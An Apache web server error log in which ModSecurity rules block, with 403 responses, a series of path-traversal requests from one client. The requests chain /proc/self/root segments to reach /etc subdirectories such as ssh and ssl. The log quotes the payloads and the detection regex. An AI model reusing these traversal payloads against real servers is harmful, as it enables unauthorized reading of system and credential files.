[Thu Mar 19 06:51:09.203595 2026] [:error] [pid 27403:tid 140411716749056] [client 74.7.243.128:41808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHDBkFeYa1D6dYQnDP5wAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:12.137768 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:51:13.582969 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:42562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHEV_V7PWP6ixUYl6cZAAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:15.578684 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.228.61:41642] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvHEwbLMZ6AikZjR9U9YgAAABU"]
[Thu Mar 19 06:51:17.815313 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:42576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHFQkwaGbbGflqUZCabQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:23.595911 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:56518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHG9a6ubjKNq_cu4YoSQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:27.832210 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:56524] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHH9a6ubjKNq_cu4YoTQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:32.947546 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:37772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHJF_V7PWP6ixUYl6ccgAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:35.129778 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:34966] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:51:38.253158 2026] [:error] [pid 27403:tid 140411616036608] [client 74.7.243.128:37784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHKhkFeYa1D6dYQnDP_QAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:43.071250 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:53042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHLwkwaGbbGflqUZCaewAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:48.540945 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:53052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHNNa6ubjKNq_cu4YoVgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:55.307504 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:57116] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHO-yqAr6etmhZHNpD8gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:51:57.128209 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35534] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:52:01.460548 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.243.128:43774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHQV_V7PWP6ixUYl6cfwAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:05.870636 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:43776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHRcdf6f5d65gmYZRUuQAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:11.348543 2026] [:error] [pid 27293:tid 140411632822016] [client 74.7.243.128:33364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHS_-YZRR_7pZ7nDJt7wAAA80"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:17.106502 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.243.128:33372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHUeyqAr6etmhZHNpEGwAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:17.312074 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:33372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHUeyqAr6etmhZHNpEHAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:22.133793 2026] [proxy_fcgi:error] [pid 27403:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:52:25.727956 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.243.128:52382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHWQbLMZ6AikZjR9U9kwAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:25.939371 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:52382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHWQbLMZ6AikZjR9U9lAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:36.519738 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:52398] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHY-oXxyEfFpUF8f_wXwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:40.946040 2026] [mime_magic:error] [pid 17887:tid 140411691570944] (70014)End of file found: [client 57.141.18.102:40138] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 06:52:40.995185 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:57818] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHaAkwaGbbGflqUZCalQAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 06:52:44.127728 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:36688] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 06:52:46.580801 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:57834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvHbuyqAr6etmhZHNpENQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
